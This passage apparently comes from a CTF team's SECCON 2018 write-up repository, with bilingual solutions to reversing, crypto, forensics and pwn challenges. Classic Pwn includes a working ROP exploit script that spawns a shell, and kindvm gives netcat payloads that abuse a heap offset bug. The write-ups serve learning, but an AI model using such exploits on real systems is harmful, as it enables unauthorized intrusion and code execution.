(434)](shooter) 25 | - [Special Device File (231)](special-device-file) 26 | - [Special Instructions (262)](special-instructions) 27 | - [tctkToy (419)](tctktoy) 28 | 29 | ## Web 30 | - [GhostKingdom (248)](ghostkingdom) -------------------------------------------------------------------------------- /seccon2018/block/README.md: -------------------------------------------------------------------------------- 1 | # Block 2 | --- 3 | **Points:** 362 | **Solves:** 29/653 | **Category:** Reversing 4 | 5 | BREAK THE BLOCK! 6 | 7 | Hint: Real answer flag is not easy to get it, if your post flag is incorrect, it is not real one. Please try to analyze more. 8 | 9 | [Download](block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | With some recon, we knew the APK is built with Unity. We used [Unity Unpacker](http://devxdevelopment.com/UnityUnpacker) to analyze this APK and found this interesting asset. 17 | 18 | ![flag asset](block.png) 19 | 20 | We tried to submit `SECCON{Y0U_4R3_34CH+3R?}` but failed. My friend suggested that the word is *cheater*, and tried to submit `SECCON{Y0U_4R3_CH34+3R?}` but failed again. Then I tried to fix the grammar, and we got the flag! 21 | 22 | Flag: `SECCON{4R3_Y0U_CH34+3R?}` 23 | 24 | ## Bahasa Indonesia 25 | Kami mempelajari bahwa APK dibuat dengan Unity. Kami menggunakan [Unity Unpacker](http://devxdevelopment.com/UnityUnpacker) untuk menganalisa APK ini dan menemukan asset yang menarik. 26 | 27 | ![flag asset](block.png) 28 | 29 | Kami mencoba submit `SECCON{Y0U_4R3_34CH+3R?}` tetapi gagal. Teman saya memberi ide kalau katanya adalah *cheater* dan mencoba untuk submit `SECCON{Y0U_4R3_CH34+3R?}` tetapi gagal juga. Kemudian saya membetulkan grammar-nya, dan ternyata mendapat flag! 30 | 31 | Flag: `SECCON{4R3_Y0U_CH34+3R?}` 32 | -------------------------------------------------------------------------------- /seccon2018/block/block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/block/block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf -------------------------------------------------------------------------------- /seccon2018/block/block.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/block/block.png -------------------------------------------------------------------------------- /seccon2018/boguscrypt/Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/boguscrypt/Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae -------------------------------------------------------------------------------- /seccon2018/boguscrypt/README.md: -------------------------------------------------------------------------------- 1 | # Boguscrypt 2 | --- 3 | **Points:** 162 | **Solves:** 125/653 | **Category:** Crypto 4 | 5 | Boguscrypt 6 | 7 | Hey, Can you decrypt the file? 8 | 9 | [Download](Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | TODO 17 | 18 | 19 | ## Bahasa Indonesia 20 | TODO 21 | -------------------------------------------------------------------------------- /seccon2018/classic-pwn/README.md: -------------------------------------------------------------------------------- 1 | # Classic Pwn 2 | --- 3 | **Points:** 121 | **Solves:** 197/653 | **Category:** Pwn 4 | 5 | Host: classic.pwn.seccon.jp 6 | Port: 17354 7 | 8 | [Download](classic_aa9e979fd5c597526ef30c003bffee474b314e22) 9 | [Download](libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | A classic binary exploitation challenge. 17 | ``` 18 | CANARY : disabled 19 | FORTIFY : disabled 20 | NX : ENABLED 21 | PIE : disabled 22 | RELRO : Partial 23 | ``` 24 | 25 | Below is the main function. 26 | ``` 27 | int __cdecl main(int argc, const char **argv, const char **envp) 28 | { 29 | char v4; // [rsp+0h] [rbp-40h] 30 | 31 | puts("Classic Pwnable Challenge"); 32 | printf("Local Buffer >> ", argv); 33 | gets(&v4); 34 | puts("Have a nice pwn!!"); 35 | return 0; 36 | } 37 | ``` 38 | 39 | The program calls gets without canary. 40 | Spawn shell by ROP overwriting return-address (rbp+0x8) to leak-libc -> back-to-main. 41 | On the second gets, call one_gadget. 42 | ``` 43 | 1st gets: pop rdi -> puts GOT/PLT -> function puts -> main 44 | 2nd gets: one_gadget 45 | ``` 46 | 47 | Below is the script. 48 | ```python 49 | from pwn import * 50 | 51 | one = [0x45216, 0x4526a, 0xf02a4, 0xf1147] 52 | 53 | r = remote('classic.pwn.seccon.jp', 17354) 54 | libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 55 | 56 | r.sendline('a' * 0x48 + p64(0x00400753) + p64(0x601018) + p64(0x400520) + p64(0x4006A9)) 57 | r.recvuntil('Local Buffer >> Have a nice pwn!!\n') 58 | 59 | libc_base = u64(r.recvline().strip() + '\x00\x00') - libc.symbols.puts 60 | print hex(libc_base) 61 | 62 | r.sendline('a' * 0x48 + p64(libc_base+one[0])) 63 | r.interactive() 64 | ``` 65 | 66 | ## Bahasa Indonesia 67 | Soal klasik binary exploitation. 68 | ``` 69 | CANARY : disabled 70 | FORTIFY : disabled 71 | NX : ENABLED 72 | PIE : disabled 73 | RELRO : Partial 74 | ``` 75 | 76 | Berikut main function. 77 | ``` 78 | int __cdecl main(int argc, const char **argv, const char **envp) 79 | { 80 | char v4; // [rsp+0h] [rbp-40h] 81 | 82 | puts("Classic Pwnable Challenge"); 83 | printf("Local Buffer >> ", argv); 84 | gets(&v4); 85 | puts("Have a nice pwn!!"); 86 | return 0; 87 | } 88 | ``` 89 | 90 | Program memanggil gets tanpa canary. 91 | Spawn shell dengan ROP menimpa return address (rbp+0x8) dengan leak-libc -> balik-ke-main. 92 | Pada gets kedua, panggil one_gadget. 93 | ``` 94 | 1st gets: pop rdi -> puts GOT/PLT -> function puts -> main 95 | 2nd gets: one_gadget 96 | ``` 97 | 98 | Berikut script yang digunakan. 99 | ```python 100 | from pwn import * 101 | 102 | one = [0x45216, 0x4526a, 0xf02a4, 0xf1147] 103 | 104 | r = remote('classic.pwn.seccon.jp', 17354) 105 | libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253') 106 | 107 | r.sendline('a' * 0x48 + p64(0x00400753) + p64(0x601018) + p64(0x400520) + p64(0x4006A9)) 108 | r.recvuntil('Local Buffer >> Have a nice pwn!!\n') 109 | 110 | libc_base = u64(r.recvline().strip() + '\x00\x00') - libc.symbols.puts 111 | print hex(libc_base) 112 | 113 | r.sendline('a' * 0x48 + p64(libc_base+one[0])) 114 | r.interactive() 115 | ``` -------------------------------------------------------------------------------- /seccon2018/classic-pwn/classic_aa9e979fd5c597526ef30c003bffee474b314e22: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/classic-pwn/classic_aa9e979fd5c597526ef30c003bffee474b314e22 -------------------------------------------------------------------------------- /seccon2018/classic-pwn/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/classic-pwn/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253 -------------------------------------------------------------------------------- /seccon2018/history/J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/history/J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba -------------------------------------------------------------------------------- /seccon2018/history/README.md: -------------------------------------------------------------------------------- 1 | # History 2 | --- 3 | **Points:** 145 | **Solves:** 147/653 | **Category:** Forensics 4 | 5 | History Check changed filename. 6 | file:J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba 7 | 8 | [Download](J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba) 9 | 10 | --- 11 | 12 | [Bahasa Indonesia](#bahasa-indonesia) 13 | 14 | ## English 15 | If we open the file `J` with hex editor, we will see a kind of UTF-16LE. We can read the string with `strings` utility with proper encoding (16 bit). 16 | 17 | ``` 18 | $ strings --encoding={b,l} J 19 | " insn_nop; 31 | 1 -> insn_load; 32 | 2 -> insn_store; 33 | 3 -> insn_mov; 34 | 4 -> insn_add; 35 | 5 -> insn_sub; 36 | 6 -> insn_halt; 37 | 7 -> insn_in; 38 | 8 -> insn_out; 39 | 9 -> insn_hint; 40 | ``` 41 | 42 | Wait, the binary have gets in input name! 43 | Let's exploit it! 44 | ```cpp 45 | char *input_username() 46 | { 47 | char *dest; // ST18_4 48 | size_t v1; // eax 49 | char s; // [esp+12h] [ebp-16h] 50 | unsigned int v4; // [esp+1Ch] [ebp-Ch] 51 | 52 | v4 = __readgsdword(0x14u); 53 | printf("Input your name : "); 54 | gets(&s); 55 | dest = (char *)malloc(0xAu); 56 | v1 = strlen(&s); 57 | dest[9] = 0; 58 | strncpy(dest, &s, v1); 59 | return dest; 60 | } 61 | ``` 62 | 63 | Well. 64 | ``` 65 | Input your name : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 66 | _ _ _ _ _ ____ _____ _____ _ 67 | | | | (_)_ __ | |_/ | / ___| ____|_ _| | | 68 | | |_| | | '_ \| __| | | | _| _| | | | | 69 | | _ | | | | | |_| | | |_| | |___ | | |_| 70 | |_| |_|_|_| |_|\__|_| \____|_____| |_| (_) 71 | 72 | 73 | Nice try! The theme of this binary is not Stack-Based BOF! 74 | However, your name is not meaningless... 75 | ``` 76 | 77 | Okay, moving on. Let's just call instruction 9 (hint). 78 | ``` 79 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x09\n' | nc kindvm.pwn.seccon.jp 12345 80 | Input your name : Input instruction : _ _ _ 81 | | | _(_)_ __ __| |_ ___ __ ___ 82 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 83 | | <| | | | | (_| |\ V /| | | | | | 84 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 85 | 86 | Instruction start! 87 | _ _ _ _ ____ ____ _____ _____ _ 88 | | | | (_)_ __ | |_|___ \ / ___| ____|_ _| | | 89 | | |_| | | '_ \| __| __) | | | _| _| | | | | 90 | | _ | | | | | |_ / __/ | |_| | |___ | | |_| 91 | |_| |_|_|_| |_|\__|_____| \____|_____| |_| (_) 92 | 93 | Nice try! You can analyze vm instruction and execute it! 94 | Flag file name is "flag.txt". 95 | ``` 96 | 97 | Sure! 98 | We also see a third hint in the binary (insn_add). 99 | ``` 100 | _DWORD *insn_add() 101 | { 102 | _DWORD *result; // eax 103 | unsigned __int8 v1; // [esp+Ah] [ebp-Eh] 104 | unsigned __int8 v2; // [esp+Bh] [ebp-Dh] 105 | signed int v3; // [esp+Ch] [ebp-Ch] 106 | 107 | v1 = load_insn_uint8_t(); 108 | v2 = load_insn_uint8_t(); 109 | if ( v1 > 7u ) 110 | kindvm_abort(); 111 | if ( v2 > 7u ) 112 | kindvm_abort(); 113 | if ( *((_DWORD *)reg + v1) >= 0 ) 114 | v3 = 1; 115 | result = (char *)reg + 4 * v1; 116 | *result += *((_DWORD *)reg + v2); 117 | if ( v3 ) 118 | { 119 | result = (_DWORD *)*((_DWORD *)reg + v1); 120 | if ( (signed int)result < 0 ) 121 | hint3(); 122 | } 123 | return result; 124 | ``` 125 | 126 | It requires user to have reg + v1 of negative value. Let's try to load by `in` (7) function. 127 | ```cpp 128 | int insn_in() 129 | { 130 | int result; // eax 131 | unsigned __int8 v1; // [esp+Bh] [ebp-Dh] 132 | int v2; // [esp+Ch] [ebp-Ch] 133 | 134 | v1 = load_insn_uint8_t(); 135 | v2 = load_insn_uint32_t(); 136 | if ( v1 > 7u ) 137 | kindvm_abort(); 138 | result = v2; 139 | *((_DWORD *)reg + v1) = v2; 140 | return result; 141 | } 142 | 143 | int load_insn_uint32_t() 144 | { 145 | unsigned __int8 *v0; // ebx 146 | int v1; // ST0C_4 147 | unsigned __int8 *v2; // ebx 148 | int v3; // ST0C_4 149 | unsigned __int8 *v4; // ebx 150 | int v5; // ST0C_4 151 | unsigned __int8 *v6; // ebx 152 | int v7; // ST0C_4 153 | 154 | v0 = (unsigned __int8 *)insn; 155 | v1 = v0[get_pc()]; 156 | step(); 157 | v2 = (unsigned __int8 *)insn; 158 | v3 = v2[get_pc()] + (v1 << 8); 159 | step(); 160 | v4 = (unsigned __int8 *)insn; 161 | v5 = v4[get_pc()] + (v3 << 8); 162 | step(); 163 | v6 = (unsigned __int8 *)insn; 164 | v7 = v6[get_pc()] + (v5 << 8); 165 | step(); 166 | return v7; 167 | } 168 | ``` 169 | 170 | Okay. So, we need to input register (0 - 7) and number (first input is the most significant byte). 171 | Let's do reg0 = 0xffffffff and then add r0 to r0 -> r0 = -1 + -1 = -2 (still negative). 172 | ``` 173 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x07\x00\xff\xff\xff\xff\x04\x00\x00\n' | nc kindvm.pwn.seccon.jp 12345 174 | Input your name : Input instruction : _ _ _ 175 | | | _(_)_ __ __| |_ ___ __ ___ 176 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 177 | | <| | | | | (_| |\ V /| | | | | | 178 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 179 | 180 | Instruction start! 181 | _ _ _ _ _____ ____ _____ _____ _ 182 | | | | (_)_ __ | |_|___ / / ___| ____|_ _| | | 183 | | |_| | | '_ \| __| |_ \ | | _| _| | | | | 184 | | _ | | | | | |_ ___) | | |_| | |___ | | |_| 185 | |_| |_|_|_| |_|\__|____/ \____|_____| |_| (_) 186 | 187 | Nice try! You can cause Integer Overflow! 188 | The value became minus value. Minus value is important. 189 | ``` 190 | 191 | Nice, we got (maybe) all the hints. Now, we just need to read `flag.txt`. 192 | Some notes, `reg` is stored in heap. There is also `mem` stored in heap. We can store and load `mem` with the instruction load and store. 193 | 194 | The hint states about integer overflow, so maybe integer overflow in heap. 195 | Let's see what else is in the heap. 196 | ``` 197 | v0 = malloc(0x18u); 198 | kc = (int)v0; 199 | *v0 = 0; 200 | *(_DWORD *)(kc + 4) = 0; 201 | v1 = kc; 202 | *(_DWORD *)(v1 + 8) = input_username(); 203 | *(_DWORD *)(kc + 12) = "banner.txt"; 204 | *(_DWORD *)(kc + 16) = func_greeting; 205 | *(_DWORD *)(kc + 20) = func_farewell; 206 | mem = malloc(0x400u); 207 | memset(mem, 0, 0x400u); 208 | reg = malloc(0x20u); 209 | memset(reg, 0, 0x20u); 210 | insn = malloc(0x400u); 211 | result = memset(mem, 65, 0x400u); 212 | ``` 213 | 214 | So, username is in the heap (hint says it is useful), also banner.txt, func_greeting, and func_farewell. 215 | If we can overflow and write in the heap then maybe we can change func_farewell to execute anything. 216 | Let's see what func_farewell does. 217 | ```cpp 218 | ssize_t func_farewell() 219 | { 220 | open_read_write(*(char **)(kc + 12)); 221 | return write(1, "Execution is end! Thank you!\n", 0x1Du); 222 | } 223 | ``` 224 | 225 | It reads `kc+12` which is `banner.txt` and writes it! 226 | Well then, if we can change `kc+12` to `flag.txt` by rewriting it to `name` (filled with `flag.txt`), we will get the flag. 227 | Let's see the heap then. 228 | ``` 229 | gdb-peda$ x/20wx 0x804c168 230 | 0x804c168: 0x0804c180 <= name 0x080491b2 <= banner.txt 0x08048f89 <= greeting 0x08048fba <= farewell 231 | 0x804c178: 0x00000000 0x00000011 0x00000000 0x00000000 232 | 0x804c188: 0x00000000 0x00000411 0x41414141 <= mem_start 0x41414141 233 | 0x804c198: 0x41414141 0x41414141 0x41414141 0x41414141 234 | 0x804c1a8: 0x41414141 0x41414141 0x41414141 0x41414141 235 | ``` 236 | 237 | Plan: read `name` -> write it to `banner.txt`. 238 | ``` 239 | load mem-40 to reg0 -> store reg0 to mem-36 240 | ``` 241 | 242 | ``` 243 | asdf@asdf:~/Desktop/CTF/ctf/seccon2018/classic-pwn$ echo -e 'flag.txt\n\x01\x00\xff\xd8\x02\xff\xdc\x00\x06' | nc kindvm.pwn.seccon.jp 12345 244 | Input your name : Input instruction : _ _ _ 245 | | | _(_)_ __ __| |_ ___ __ ___ 246 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 247 | | <| | | | | (_| |\ V /| | | | | | 248 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 249 | 250 | Instruction start! 251 | SECCON{s7ead1ly_5tep_by_5tep} 252 | Execution is end! Thank you! 253 | ``` 254 | Flag is captured! 255 | 256 | ## Bahasa Indonesia 257 | ``` 258 | Input your name : a 259 | Input instruction : a 260 | _ _ _ 261 | | | _(_)_ __ __| |_ ___ __ ___ 262 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 263 | | <| | | | | (_| |\ V /| | | | | | 264 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 265 | 266 | Instruction start! 267 | Error! Try again! 268 | ``` 269 | 270 | Program membaca input (1 instruksi 1 byte) dan menjalankannya. 271 | Berikut instruksinya. 272 | ``` 273 | 0 -> insn_nop; 274 | 1 -> insn_load; 275 | 2 -> insn_store; 276 | 3 -> insn_mov; 277 | 4 -> insn_add; 278 | 5 -> insn_sub; 279 | 6 -> insn_halt; 280 | 7 -> insn_in; 281 | 8 -> insn_out; 282 | 9 -> insn_hint; 283 | ``` 284 | 285 | Program memanggil `gets`! Dicoba buffer overflow. 286 | ```cpp 287 | char *input_username() 288 | { 289 | char *dest; // ST18_4 290 | size_t v1; // eax 291 | char s; // [esp+12h] [ebp-16h] 292 | unsigned int v4; // [esp+1Ch] [ebp-Ch] 293 | 294 | v4 = __readgsdword(0x14u); 295 | printf("Input your name : "); 296 | gets(&s); 297 | dest = (char *)malloc(0xAu); 298 | v1 = strlen(&s); 299 | dest[9] = 0; 300 | strncpy(dest, &s, v1); 301 | return dest; 302 | } 303 | ``` 304 | 305 | Hmm. 306 | ``` 307 | Input your name : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 308 | _ _ _ _ _ ____ _____ _____ _ 309 | | | | (_)_ __ | |_/ | / ___| ____|_ _| | | 310 | | |_| | | '_ \| __| | | | _| _| | | | | 311 | | _ | | | | | |_| | | |_| | |___ | | |_| 312 | |_| |_|_|_| |_|\__|_| \____|_____| |_| (_) 313 | 314 | 315 | Nice try! The theme of this binary is not Stack-Based BOF! 316 | However, your name is not meaningless... 317 | ``` 318 | 319 | Okay, lanjut. Mari panggil instruksi 9 (hint). 320 | ``` 321 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x09\n' | nc kindvm.pwn.seccon.jp 12345 322 | Input your name : Input instruction : _ _ _ 323 | | | _(_)_ __ __| |_ ___ __ ___ 324 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 325 | | <| | | | | (_| |\ V /| | | | | | 326 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 327 | 328 | Instruction start! 329 | _ _ _ _ ____ ____ _____ _____ _ 330 | | | | (_)_ __ | |_|___ \ / ___| ____|_ _| | | 331 | | |_| | | '_ \| __| __) | | | _| _| | | | | 332 | | _ | | | | | |_ / __/ | |_| | |___ | | |_| 333 | |_| |_|_|_| |_|\__|_____| \____|_____| |_| (_) 334 | 335 | Nice try! You can analyze vm instruction and execute it! 336 | Flag file name is "flag.txt". 337 | ``` 338 | 339 | Sip! 340 | Dapat dilihat juga terdapat hint ketiga (insn_add). 341 | ``` 342 | _DWORD *insn_add() 343 | { 344 | _DWORD *result; // eax 345 | unsigned __int8 v1; // [esp+Ah] [ebp-Eh] 346 | unsigned __int8 v2; // [esp+Bh] [ebp-Dh] 347 | signed int v3; // [esp+Ch] [ebp-Ch] 348 | 349 | v1 = load_insn_uint8_t(); 350 | v2 = load_insn_uint8_t(); 351 | if ( v1 > 7u ) 352 | kindvm_abort(); 353 | if ( v2 > 7u ) 354 | kindvm_abort(); 355 | if ( *((_DWORD *)reg + v1) >= 0 ) 356 | v3 = 1; 357 | result = (char *)reg + 4 * v1; 358 | *result += *((_DWORD *)reg + v2); 359 | if ( v3 ) 360 | { 361 | result = (_DWORD *)*((_DWORD *)reg + v1); 362 | if ( (signed int)result < 0 ) 363 | hint3(); 364 | } 365 | return result; 366 | ``` 367 | 368 | Untuk mendapaatkan hint nilai `reg + v1` harus negatif. Mari coba buat nilai reg negatif dengan fungsi `in` (7). 369 | ```cpp 370 | int insn_in() 371 | { 372 | int result; // eax 373 | unsigned __int8 v1; // [esp+Bh] [ebp-Dh] 374 | int v2; // [esp+Ch] [ebp-Ch] 375 | 376 | v1 = load_insn_uint8_t(); 377 | v2 = load_insn_uint32_t(); 378 | if ( v1 > 7u ) 379 | kindvm_abort(); 380 | result = v2; 381 | *((_DWORD *)reg + v1) = v2; 382 | return result; 383 | } 384 | 385 | int load_insn_uint32_t() 386 | { 387 | unsigned __int8 *v0; // ebx 388 | int v1; // ST0C_4 389 | unsigned __int8 *v2; // ebx 390 | int v3; // ST0C_4 391 | unsigned __int8 *v4; // ebx 392 | int v5; // ST0C_4 393 | unsigned __int8 *v6; // ebx 394 | int v7; // ST0C_4 395 | 396 | v0 = (unsigned __int8 *)insn; 397 | v1 = v0[get_pc()]; 398 | step(); 399 | v2 = (unsigned __int8 *)insn; 400 | v3 = v2[get_pc()] + (v1 << 8); 401 | step(); 402 | v4 = (unsigned __int8 *)insn; 403 | v5 = v4[get_pc()] + (v3 << 8); 404 | step(); 405 | v6 = (unsigned __int8 *)insn; 406 | v7 = v6[get_pc()] + (v5 << 8); 407 | step(); 408 | return v7; 409 | } 410 | ``` 411 | 412 | Jadi, kita perlu memasukkan register (0 - 7) dan nilainya pada input (byte pertama pada nilai paling signifikan). 413 | Coba reg0 = 0xffffffff dan panggil add r0 ke r0 -> r0 = -1 + -1 = -2 (seharusnya nilai masih negatif). 414 | ``` 415 | asdf@asdf:/media/sf_SVM/seccon$ echo -e '\n\x07\x00\xff\xff\xff\xff\x04\x00\x00\n' | nc kindvm.pwn.seccon.jp 12345 416 | Input your name : Input instruction : _ _ _ 417 | | | _(_)_ __ __| |_ ___ __ ___ 418 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 419 | | <| | | | | (_| |\ V /| | | | | | 420 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 421 | 422 | Instruction start! 423 | _ _ _ _ _____ ____ _____ _____ _ 424 | | | | (_)_ __ | |_|___ / / ___| ____|_ _| | | 425 | | |_| | | '_ \| __| |_ \ | | _| _| | | | | 426 | | _ | | | | | |_ ___) | | |_| | |___ | | |_| 427 | |_| |_|_|_| |_|\__|____/ \____|_____| |_| (_) 428 | 429 | Nice try! You can cause Integer Overflow! 430 | The value became minus value. Minus value is important. 431 | ``` 432 | 433 | Yay, dapat (mungkin) semua hint. Sekarang kita perlu membaca `flag.txt`. 434 | Beberapa keterangan, `reg` disimpan pada heap. Selain itu ada juga `mem` yang juga disimpan di heap. Kita dapat menggunakan `mem` dengan fungsi load dan store. 435 | 436 | Hint yaitu integer overflow, mungkin integer overflow pada heap. 437 | Dicek apa saja yang terdapat pada heap. 438 | ``` 439 | v0 = malloc(0x18u); 440 | kc = (int)v0; 441 | *v0 = 0; 442 | *(_DWORD *)(kc + 4) = 0; 443 | v1 = kc; 444 | *(_DWORD *)(v1 + 8) = input_username(); 445 | *(_DWORD *)(kc + 12) = "banner.txt"; 446 | *(_DWORD *)(kc + 16) = func_greeting; 447 | *(_DWORD *)(kc + 20) = func_farewell; 448 | mem = malloc(0x400u); 449 | memset(mem, 0, 0x400u); 450 | reg = malloc(0x20u); 451 | memset(reg, 0, 0x20u); 452 | insn = malloc(0x400u); 453 | result = memset(mem, 65, 0x400u); 454 | ``` 455 | 456 | Jadi, username terdapat pada heap (kata hint username penting), terdapat juga banner.txt, func_greeting, dan func_farewell pada heap. 457 | Apabila kita dapat menulis dengan overflow pada heap, maka kita dapat mengubah func_farewell untuk mengeksekusi apapun. 458 | Sebelumnya, dicek kegunaan func_farewell. 459 | ```cpp 460 | ssize_t func_farewell() 461 | { 462 | open_read_write(*(char **)(kc + 12)); 463 | return write(1, "Execution is end! Thank you!\n", 0x1Du); 464 | } 465 | ``` 466 | 467 | Fungsi tersebut membaca `kc+12` yang adalah `banner.txt` dan menulisnya! 468 | Jadi, jika kita ubah `kc+12` menjadi `flag.txt` dengan mengganti menjadi `name` (berisi `flag.txt`), kita dapat flag. 469 | Let's see the heap then. 470 | ``` 471 | gdb-peda$ x/20wx 0x804c168 472 | 0x804c168: 0x0804c180 <= name 0x080491b2 <= banner.txt 0x08048f89 <= greeting 0x08048fba <= farewell 473 | 0x804c178: 0x00000000 0x00000011 0x00000000 0x00000000 474 | 0x804c188: 0x00000000 0x00000411 0x41414141 <= mem_start 0x41414141 475 | 0x804c198: 0x41414141 0x41414141 0x41414141 0x41414141 476 | 0x804c1a8: 0x41414141 0x41414141 0x41414141 0x41414141 477 | ``` 478 | 479 | Rencana: baca `name` -> tulis ke `banner.txt`. 480 | ``` 481 | load mem-40 to reg0 -> store reg0 to mem-36 482 | ``` 483 | 484 | ``` 485 | asdf@asdf:~/Desktop/CTF/ctf/seccon2018/classic-pwn$ echo -e 'flag.txt\n\x01\x00\xff\xd8\x02\xff\xdc\x00\x06' | nc kindvm.pwn.seccon.jp 12345 486 | Input your name : Input instruction : _ _ _ 487 | | | _(_)_ __ __| |_ ___ __ ___ 488 | | |/ / | '_ \ / _` \ \ / / '_ ` _ \ 489 | | <| | | | | (_| |\ V /| | | | | | 490 | |_|\_\_|_| |_|\__,_| \_/ |_| |_| |_| 491 | 492 | Instruction start! 493 | SECCON{s7ead1ly_5tep_by_5tep} 494 | Execution is end! Thank you! 495 | ``` 496 | Flag didapatkan! -------------------------------------------------------------------------------- /seccon2018/kindvm/kindvm_79726158fec11eb1e5a89351db017e13506d3a4a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/kindvm/kindvm_79726158fec11eb1e5a89351db017e13506d3a4a -------------------------------------------------------------------------------- /seccon2018/mnemonic/README.md: -------------------------------------------------------------------------------- 1 | # mnemonic 2 | --- 3 | **Points:** 260 | **Solves:** 62/653 | **Category:** Crypto 4 | 5 | Read me. 6 | 7 | [Download](mnemonic.txt) 8 | 9 | --- 10 | 11 | [Bahasa Indonesia](#bahasa-indonesia) 12 | 13 | ## English 14 | During contest, we didn't know that this challenge is related to blockchain. With some googling, we figured out this *mnemonic* term and found this [json file](https://github.com/trezor/python-mnemonic/blob/master/vectors.json), similar to our challenge. We learned the python code and found out what our challenge file is. 15 | 16 | ```json 17 | { 18 | // language 19 | "japanese": [ 20 | [ 21 | // entropy 22 | "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc", 23 | // mnemonic 24 | "ふじみ あさひ みのう いっち いがく とない はづき ますく いせえび たれんと おとしもの おどろかす ことし おくりがな ちょうし ちきゅう さんきゃく こんとん せつだん ちしき ぬいくぎ まんなか たんい そっと", 25 | // seed 26 | "338c161dbdb47c570d5d75d5936e6a32178adde370b6774d40d97a51835d7fec88f859e0a6660891fc7758d451d744d5d3b1a1ebd1123e41d62d5a1550156b1f" 27 | ], 28 | // ... 29 | } 30 | ``` 31 | 32 | Our goal is to find the entropy that starts with `c0f`, given mnemonic with missing one word. We can bruteforce the japanese word list and verify the seed starts with `e9a`. Using this script, we got the flag. 33 | 34 | ```python 35 | import sys 36 | from binascii import hexlify, unhexlify 37 | from mnemonic import Mnemonic 38 | from hashlib import md5 39 | 40 | def b2h(b): 41 | h = hexlify(b) 42 | return h if sys.version < '3' else h.decode('utf8') 43 | 44 | mnemo = Mnemonic("japanese") 45 | words = "とかす なおす よけい ちいさい さんらん けむり ていど かがく とかす そあく きあい ぶどう こうどう ねみみ にあう ねんぐ ひねる おまいり いちじ ぎゅうにく みりょく ろしゅつ あつめる" 46 | words = mnemo.normalize_string(words).split(" ") 47 | for word in mnemo.wordlist: 48 | guess = [word] + words 49 | seed = Mnemonic.to_seed(" ".join(guess), passphrase="") 50 | if not b2h(seed).startswith("e9a"): 51 | continue 52 | 53 | entropy = b2h(mnemo.to_entropy(guess)) 54 | if entropy.startswith("c0f"): 55 | print(entropy) 56 | print("SECCON{%s}" % (md5(entropy.encode()).hexdigest())) 57 | break 58 | ``` 59 | 60 | Flag: `SECCON{cda2cb1742d1b6fc21d05c879c263eec}` 61 | 62 | ## Bahasa Indonesia 63 | Saat kontes, kami tidak tahu kalau soal ini terkait dengan blockchain. Dengan bantuan Google, kami mendapat istilah *mnemonic* ini dan menemukan [file json](https://github.com/trezor/python-mnemonic/blob/master/vectors.json) yang mirip dengan soal. Kami juga mempelajari kode python-nya dan akhirnya mengetahui arti dari string yang ada di soal. 64 | 65 | ```json 66 | { 67 | // language 68 | "japanese": [ 69 | [ 70 | // entropy 71 | "d3a02b9706507552f0e70709f1d4921275204365b4995feae1d949fb59c663cc", 72 | // mnemonic 73 | "ふじみ あさひ みのう いっち いがく とない はづき ますく いせえび たれんと おとしもの おどろかす ことし おくりがな ちょうし ちきゅう さんきゃく こんとん せつだん ちしき 